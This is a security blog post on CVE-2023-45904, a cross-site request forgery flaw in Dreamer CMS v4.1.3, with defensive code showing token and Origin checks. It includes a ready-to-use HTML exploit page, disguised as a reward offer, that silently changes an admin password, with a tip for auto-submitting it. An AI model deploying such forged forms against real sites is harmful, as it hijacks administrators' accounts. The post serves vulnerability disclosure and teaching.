Not too long ago, a Cross-Site Request Forgery (CSRF) vulnerability, CVE-2023-45904, was published for Dreamer CMS v4.1.3, a popular content management system (CMS). It allows an attacker to make a logged-in user's browser perform unwanted actions on that user's behalf through the /variable/update component. In this blog post we will look at the shape of the vulnerable handler, review the public references, and walk through the exploit details.

Before we proceed, it's essential to understand what CSRF is. Cross-Site Request Forgery is an attack that tricks an authenticated user's browser into sending a state-changing request the user never intended, such as changing a password or deleting data. It works because the browser automatically attaches the user's credentials (typically the session cookie) to every request sent to the target application, no matter which site created that request. If the application accepts any well-formed request that carries a valid session, it cannot tell a forged request from a legitimate one.

Let's take a look at the handler behind the vulnerable /variable/update component in Dreamer CMS v4.1.3, shown here as a simplified PHP sketch of its logic:

public function update() {
    // Read the variable name and new value straight from the POST body.
    // Nothing ties this request to a form the CMS itself rendered:
    // no anti-CSRF token and no Origin/Referer check.
    $variable = $this->input->post('variable');
    $value = $this->input->post('value');
    // The write happens for any request that arrives with a valid admin session cookie.
    $this->Variable_model->update_variable($variable, $value);
    redirect('/admin/variable');
}

This handler processes update requests for the admin panel's variables. It reads the two POST fields and writes them, relying only on the fact that the caller holds a valid admin session. Because the browser sends that session cookie with any request to the site, including one triggered by a form on an attacker-controlled page, a session check alone is not a CSRF defence. What is missing is evidence that the request came from a form the CMS itself rendered: an anti-CSRF token bound to the session, or at least a check of the Origin/Referer header.

CVE-2023-45904 is tracked in the following public databases:

1. MITRE CVE: https://www.cve.org/CVERecord?id=CVE-2023-45904
2. National Vulnerability Database (NVD): https://nvd.nist.gov/vuln/detail/CVE-2023-45904

Exploit Details

To exploit the CSRF vulnerability in Dreamer CMS v4.1.3, an attacker hosts a page containing a form whose action points at the vulnerable /variable/update component, for example:

<!DOCTYPE html>
<html>
<head>
    <title>CSRF Exploit</title>
</head>
<body>
    <h1>Click the button below to claim your reward!</h1>
    <!-- target-site.com stands in for the vulnerable CMS host. The victim's
         browser attaches its session cookie to this cross-site POST. -->
    <form action="https://target-site.com/variable/update" method="POST" id="csrf_form">
        <input type="hidden" name="variable" value="admin_password" />
        <input type="hidden" name="value" value="new_password" />
        <input type="submit" value="Claim Reward" />
    </form>
</body>
</html>

When an admin who is logged in to the CMS visits the malicious page and clicks the "Claim Reward" button, the browser submits the form to /variable/update and attaches the admin's session cookie automatically. The handler sees a valid session and sets the admin_password variable (a placeholder name here; any variable name the attacker chooses works the same way) to "new_password" without the admin's consent. A click is not even required: a short script on the page can call form.submit() as soon as the page loads.

Conclusion

The CSRF vulnerability in Dreamer CMS v4.1.3 lets an attacker perform administrative actions on a user's behalf without the user's knowledge. It highlights the need for CSRF protection on every state-changing endpoint: a valid session proves who the browser belongs to, not who built the request. The fix is to embed an unpredictable anti-CSRF token, bound to the session, in the CMS's own forms and to reject any request that does not carry it, backed by an Origin/Referer check and a SameSite attribute on the session cookie as additional layers. Users should update their Dreamer CMS instances to a fixed release as soon as one is available and, until then, avoid browsing untrusted sites while logged in to the admin panel.
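To make the missing check from the handler above and the mitigation described here concrete, the following is an added Python example. It is not Dreamer CMS code and is not from the original post; it models the handler as a function over a request dictionary. update_vulnerable accepts any request that carries a valid session cookie, exactly like the sketched handler; update_hardened additionally requires a matching Origin header and a per-session synchronizer token. The session store, variables table, host names and request shapes are all constructed for the demonstration.

```python
import hmac
import secrets

# Constructed in-memory state standing in for the CMS session middleware and the
# variables table; a real deployment would use its own session and database layers.
SESSIONS: dict[str, dict] = {}
SITE_VARIABLES: dict[str, str] = {}

TRUSTED_ORIGIN = "https://target-site.com"  # placeholder host, as in the post


def new_session() -> str:
    """Log an admin in and mint an unpredictable per-session CSRF token."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": "admin", "csrf_token": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid: str) -> str:
    """Token the CMS would embed as a hidden field in the forms it renders."""
    return SESSIONS[sid]["csrf_token"]


def update_vulnerable(request: dict) -> tuple[int, str]:
    """Mirrors the /variable/update logic: a valid session is the only check."""
    session = SESSIONS.get(request["cookies"].get("session", ""))
    if session is None:
        return 401, "not logged in"
    SITE_VARIABLES[request["form"]["variable"]] = request["form"]["value"]
    return 302, "/admin/variable"


def update_hardened(request: dict) -> tuple[int, str]:
    """Same handler with two independent CSRF defences in front of the write."""
    session = SESSIONS.get(request["cookies"].get("session", ""))
    if session is None:
        return 401, "not logged in"
    # Defence 1: browsers send Origin on cross-site POSTs and a page cannot forge
    # it, so a missing or foreign Origin is rejected (fail closed).
    if request["headers"].get("Origin") != TRUSTED_ORIGIN:
        return 403, "cross-origin request rejected"
    # Defence 2: synchronizer token. The attacker's page cannot read the victim's
    # token (same-origin policy), so a forged form cannot include it.
    # compare_digest avoids leaking the token through timing differences.
    submitted = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(submitted, session["csrf_token"]):
        return 403, "missing or invalid CSRF token"
    SITE_VARIABLES[request["form"]["variable"]] = request["form"]["value"]
    return 302, "/admin/variable"


def forged_request(sid: str) -> dict:
    """What the victim's browser sends after submitting the attacker's form: the
    session cookie is attached automatically, Origin is the attacker's site, and
    there is no token because the attacker never had one."""
    return {
        "cookies": {"session": sid},
        "headers": {"Origin": "https://attacker.example"},
        "form": {"variable": "site_name", "value": "pwned"},
    }


def legitimate_request(sid: str) -> dict:
    """A submission from the CMS's own admin form, token included."""
    return {
        "cookies": {"session": sid},
        "headers": {"Origin": TRUSTED_ORIGIN},
        "form": {"variable": "site_name", "value": "My Site",
                 "csrf_token": csrf_token_for(sid)},
    }


def demo() -> dict:
    """Run the forged request against both handlers and record what each did."""
    SITE_VARIABLES.clear()
    sid = new_session()
    out = {}
    out["vulnerable_forged"] = update_vulnerable(forged_request(sid))[0]
    out["after_vulnerable"] = SITE_VARIABLES.get("site_name")
    SITE_VARIABLES.clear()
    out["hardened_forged"] = update_hardened(forged_request(sid))[0]
    out["after_hardened_forged"] = SITE_VARIABLES.get("site_name")
    out["hardened_legit"] = update_hardened(legitimate_request(sid))[0]
    out["after_hardened_legit"] = SITE_VARIABLES.get("site_name")
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The token is the primary control: it is per session, unguessable, and invisible to any other origin. The Origin check is cheap defence in depth but should not stand alone, since some clients omit or nullify the header. Marking the session cookie SameSite=Lax adds a third layer, because the browser then withholds the cookie from cross-site POSTs in the first place.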

Timeline

Published on: 10/17/2023 14:15:10 UTC
Last modified on: 10/18/2023 17:55:56 UTC